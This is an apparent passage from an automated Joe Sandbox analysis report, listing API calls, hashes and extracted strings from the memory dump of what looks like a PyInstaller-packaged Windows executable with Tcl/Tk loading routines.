                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AA0013190E90AD1EA54AB14E8940252228BB94300B9000B3E10DD10A49E3DA80AA204
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                • Instruction ID: 0ad06d64bd70651bbda1bf80620953fc4e3d941bb86587df8533bbb294e3baa5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0602A170E0BB07D2EA15BF65A8605B522A9BF08756F4454F7D82EC2260EF7DB54BF200
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE29390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6AAE245F4,00000000,00007FF6AAE21985), ref: 00007FF6AAE293C9
                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6AAE286B7,?,?,00000000,00007FF6AAE23CBB), ref: 00007FF6AAE2822C
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22810: MessageBoxW.USER32 ref: 00007FF6AAE228EA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                • Instruction ID: 9cb142fc2ed73f734cc48efa1acfb311225d396f5d19cd24626de28baffbc51f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14516831B1F683C2FE60BF25E8552B96254BF94780F4454F3D64EC26D5EE2CE50AA740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction ID: 6d9b04696073233c5a61a00820151604a07ca68d8f80f4a1d3dd4b02a6311ec7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7251D7366057A1C7D6349F26E4181BAB7A1F798B61F004126EBDE83694DF3CD046DB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction ID: 358a0e6c4829a0e37d07d3d9d116d7a20036d907fe45bbed10f345fe739dceea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9219731B0AA83C2EB45AF7AF8541796354FF88B90F5841B2DA1DC33D5DE2CD5969301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction ID: 7a6682f9af5b027a38a685b351b24576b898728b7c36f6deb0c9136ed77da11c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F128F71E0A243C6FB207B25D15427BF6A2FB40750F844177E6CA866E4DF7CE582AB24
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                • Instruction ID: 04806ecdfd0c6170b5d1e534e1794dafdfa5c514d6560263623336fa63cf502f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82127371E0E143C6FF207A15D0546B9F6A1FB80750F89407BD6DA869E4DF7CE482AB20
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: 3fcaef56aa373d24da331bb5278b6a1dfc31825f84f9256db7146085441c69be
                                                                                                                                                                                                                                • Instruction ID: 910e5d825557911a0ee2181200a89e97135e7d52a07345382a2dc1689e2dd31d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fcaef56aa373d24da331bb5278b6a1dfc31825f84f9256db7146085441c69be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41414A31A0A653C2EE10FF12A8006BAA394BF44B84F4444F3ED4D87796DE3CE60BA740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: b1bceb7afb0ab750bae96328be3101e79f765b20ab76d1c5689971f3e95f976c
                                                                                                                                                                                                                                • Instruction ID: 5566bef7e9a3bce9c6698a554390525de311a6cc7754aac591736830673e3990
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1bceb7afb0ab750bae96328be3101e79f765b20ab76d1c5689971f3e95f976c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7415932A4A647C6EE10FF21D4005B9A390BF44794F4845F3EE4D97AA9DE3CE60BA700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction ID: 1acb110b4fe2f3e123ec69ff9acffd563d0d77447f329af2279db24a544cbc95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BD17E32A09752CAEF20AF65D4803AD7BA4FB45788F1001B6DE4D97B95CF38E49AD701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6AAE3F0AA,?,?,000001A408979F98,00007FF6AAE3AD53,?,?,?,00007FF6AAE3AC4A,?,?,?,00007FF6AAE35F3E), ref: 00007FF6AAE3EE8C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6AAE3F0AA,?,?,000001A408979F98,00007FF6AAE3AD53,?,?,?,00007FF6AAE3AC4A,?,?,?,00007FF6AAE35F3E), ref: 00007FF6AAE3EE98
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction ID: 909a78657a549d393d13761a948cbd2fc0e89a766a1e99a6b2a8ff041c2ce494
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D41E331B1BA02C1FA15EB16A81057563E5BF48B90F88857BDD5EC77A4EF3CE806A310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22C9E
                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22D63
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6AAE22D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction ID: c527e9f015d1a8137d7b8471bb708c0baeddaf0fbce7987778a151b2ccdc5e3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D31E532B09B4182EA20BB25B8542AA6695BF88798F410177EF4DD3759DF3CD50BD300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DD4D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DD5B
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DD85
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DDF3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6AAE2DF7A,?,?,?,00007FF6AAE2DC6C,?,?,?,00007FF6AAE2D869), ref: 00007FF6AAE2DDFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2683047350.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2682909344.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683410869.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2683699377.00007FF6AAE62000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2684046557.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction ID: ab01fe8fb67422500bc14a6dfd3580106c173d9a4663f0da61c5474ec6e03650
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E319231B1BB43D1EE51AF16A4406A52394FF48BA4F5946B7DE1EC7384EF3CE44A9210
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
